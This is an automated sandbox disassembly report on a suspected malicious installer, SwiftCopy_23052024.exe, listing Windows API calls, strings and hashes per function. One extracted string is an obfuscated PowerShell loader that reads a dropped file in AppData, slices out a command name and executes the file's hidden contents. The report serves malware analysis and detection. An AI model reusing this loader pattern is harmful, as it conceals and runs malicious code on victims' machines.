Part of subcall function 004048C4: lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
Part of subcall function 004048C4: wsprintfA.USER32 ref: 0040496A
Part of subcall function 004048C4: SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D

Strings

Execute: , xrefs: 0040466E, 00404673, 0040467E
C:\Users\user\AppData\Roaming\fertiliseringer, xrefs: 0040465D
A, xrefs: 00404630
"$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)", xrefs: 00404526

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"$A$C:\Users\user\AppData\Roaming\fertiliseringer$Execute:
API String ID: 2624150263-1215431433
Opcode ID: d4b3f3b2f740cd1d119d622ff8d61d2cb843dd3428f3d07c9c6955b466388861
Instruction ID: c53a8e09cffb511e2e8442f8e0ee4109053d5ca2156788ad792cf5210b9728ca
Opcode Fuzzy Hash: d4b3f3b2f740cd1d119d622ff8d61d2cb843dd3428f3d07c9c6955b466388861
Instruction Fuzzy Hash: F4A17FB1900209ABDB11AFA5CD45AAFB7B8EF85314F14843BF601B62D1D77C8A418F69

Function 004057B5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004057DE
lstrcatA.KERNEL32(007A0550,\*.*,007A0550,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405826
lstrcatA.KERNEL32(?,0040A014,?,007A0550,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405847
lstrlenA.KERNEL32(?,?,0040A014,?,007A0550,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 0040584D
FindFirstFileA.KERNEL32(007A0550,?,?,?,0040A014,?,007A0550,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 0040585E
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040590B
FindClose.KERNEL32(00000000), ref: 0040591C

Strings

"C:\Users\user\Desktop\SwiftCopy_23052024.exe", xrefs: 004057B5
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004057C2
\*.*, xrefs: 00405820

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\SwiftCopy_23052024.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
API String ID: 2035342205-982447053
Opcode ID: 8fda1b6a8b55d101ad800504929e014ab0da255cf75589647b7755d6ebd2940b
Instruction ID: eea8dcc9899e8fe382e67b4d85d328ba4a3fbbae0ab86688a1659871ceec6938
Opcode Fuzzy Hash: 8fda1b6a8b55d101ad800504929e014ab0da255cf75589647b7755d6ebd2940b
Instruction Fuzzy Hash: 4051E171800A08FADF226B618C45FAF7A78DF42728F14807BF841B51D2D73C4992DE69

Function 00402138 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00408410,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021BA
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269

Strings

C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes, xrefs: 004021FA

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes
API String ID: 123533781-922723700
Opcode ID: e998acbe2f1b43c54e27e9257d2e665da4c99f4d1dd89977e558b1f398561c73
Instruction ID: b20e6ddc0005349e031541e3270fed9150ef90c2934288fc693311ea7f84ec63
Opcode Fuzzy Hash: e998acbe2f1b43c54e27e9257d2e665da4c99f4d1dd89977e558b1f398561c73
Instruction Fuzzy Hash: 1F511871A00209AFCF00DFE4C988A9D7BB5FF48314F2085AAF515EB2D1DB799941CB54

Function 00402765 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: ce5ee05335aaee257a5376a3e598e513c7ac679b7a51357427677739d22e6ab6
Instruction ID: 242f43cfa1d4ef5d1935b54718e26804d33959e399511836c9edd6ef5d071c48
Opcode Fuzzy Hash: ce5ee05335aaee257a5376a3e598e513c7ac679b7a51357427677739d22e6ab6
Instruction Fuzzy Hash: 5AF0A0725441009BD701EBB49A49AEEB768AF26324F6041BBE141F21C1D6B889459B6A

Function 00404A80 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A97
GetDlgItem.USER32(?,00000408), ref: 00404AA4
GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404AF3
LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404B0A
SetWindowLongA.USER32(?,000000FC,00405088), ref: 00404B24
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B36
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B4A
SendMessageA.USER32(?,00001109,00000002), ref: 00404B60
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6C
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B7C
DeleteObject.GDI32(00000110), ref: 00404B81
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAC
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BB8
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C52
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404C82

Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,00000001,00403EE0), ref: 004040BE

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C96
GetWindowLongA.USER32(?,000000F0), ref: 00404CC4
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CD2
ShowWindow.USER32(?,00000005), ref: 00404CE2
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DDD
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E42
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E57
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E7B
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E9B
ImageList_Destroy.COMCTL32(?), ref: 00404EB0
GlobalFree.KERNEL32(?), ref: 00404EC0
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F39
SendMessageA.USER32(?,00001102,?,?), ref: 00404FE2
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FF1
InvalidateRect.USER32(?,00000000,00000001), ref: 00405011
ShowWindow.USER32(?,00000000), ref: 0040505F
GetDlgItem.USER32(?,000003FE), ref: 0040506A
ShowWindow.USER32(00000000), ref: 00405071

Strings

M, xrefs: 00404C3A
, xrefs: 00405049
N, xrefs: 00404D1B

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 14a0e38701a0988d10f8f3b944e88022ed5e2c604d7dd73604d5962291bc721a
Instruction ID: a268e52f59abad667f40846b9330857a26eef97fbfd8c04b7b0b2c1eeebe026e
Opcode Fuzzy Hash: 14a0e38701a0988d10f8f3b944e88022ed5e2c604d7dd73604d5962291bc721a
Instruction Fuzzy Hash: 56026DB0900209EFEB109FA8DD45AAE7BB5FB84314F10813AF610B62E1D7789D52DF58

Function 004041E6 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404271
GetDlgItem.USER32(00000000,000003E8), ref: 00404285
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004042A3
GetSysColor.USER32(?), ref: 004042B4
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004042C3
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004042D2
lstrlenA.KERNEL32(?), ref: 004042D5
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042E4
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042F9
GetDlgItem.USER32(?,0000040A), ref: 0040435B
SendMessageA.USER32(00000000), ref: 0040435E
GetDlgItem.USER32(?,000003E8), ref: 00404389
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004043C9
LoadCursorA.USER32(00000000,00007F02), ref: 004043D8
SetCursor.USER32(00000000), ref: 004043E1
LoadCursorA.USER32(00000000,00007F00), ref: 004043F7
SetCursor.USER32(00000000), ref: 004043FA
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404426
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040443A

Strings

Execute: , xrefs: 004043B4
N, xrefs: 00404377

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Execute: $N
API String ID: 3103080414-3656399340
Opcode ID: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
Instruction ID: a3db5b80d5f6c8d56f7a184239f37e003a0a90a84a660de175ffc46cbe068f47
Opcode Fuzzy Hash: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
Instruction Fuzzy Hash: D361B5B1A40204BFEF109F60DD45F6A7B69FB84704F10802AFB05BA1D1C7B8A951CF99

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,?), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Trvlemund Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Trvlemund Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Trvlemund Setup
API String ID: 941294808-3898213010
Opcode ID: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
Instruction ID: 1ef7ef1d3183d2fe833be2fdc16277d02f602c466de40d92ea6efb336f18bcfe
Opcode Fuzzy Hash: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
Instruction Fuzzy Hash: 53417C71400249AFCB058FA5DE459BF7BB9FF45314F00802EF9A1AA1A0C778DA55DFA4

Function 00405C5C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DED,?,?), ref: 00405C8D
GetShortPathNameA.KERNEL32(?,007A12D8,00000400), ref: 00405C96

Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AFB
Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B2D

GetShortPathNameA.KERNEL32(?,007A16D8,00000400), ref: 00405CB3
wsprintfA.USER32 ref: 00405CD1
GetFileSize.KERNEL32(00000000,00000000,007A16D8,C0000000,00000004,007A16D8,?,?,?,?,?), ref: 00405D0C
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D1B
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D53
SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,007A0ED8,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405DA9
GlobalFree.KERNEL32(00000000), ref: 00405DBA
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DC1

Part of subcall function 00405B86: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\SwiftCopy_23052024.exe,80000000,00000003), ref: 00405B8A
Part of subcall function 00405B86: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BAC

Strings

%s=%s, xrefs: 00405CC7
[Rename], xrefs: 00405D3B, 00405D4D

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: e21f7c93fe3bd66da2b6b7da4a0b9e2cc96e381ade22814a2b5c425f3e481a44
Instruction ID: 4ef5f1c50d251b73862b961a89edc9b2cc60572935cd21a4370a6936b8511f12
Opcode Fuzzy Hash: e21f7c93fe3bd66da2b6b7da4a0b9e2cc96e381ade22814a2b5c425f3e481a44
Instruction Fuzzy Hash: 5231F231201B15ABD2206B659D4DF6B3A6CDF86754F14053FFA01F62D2EA3CE8058EAD

Function 00406257 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SwiftCopy_23052024.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403223,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
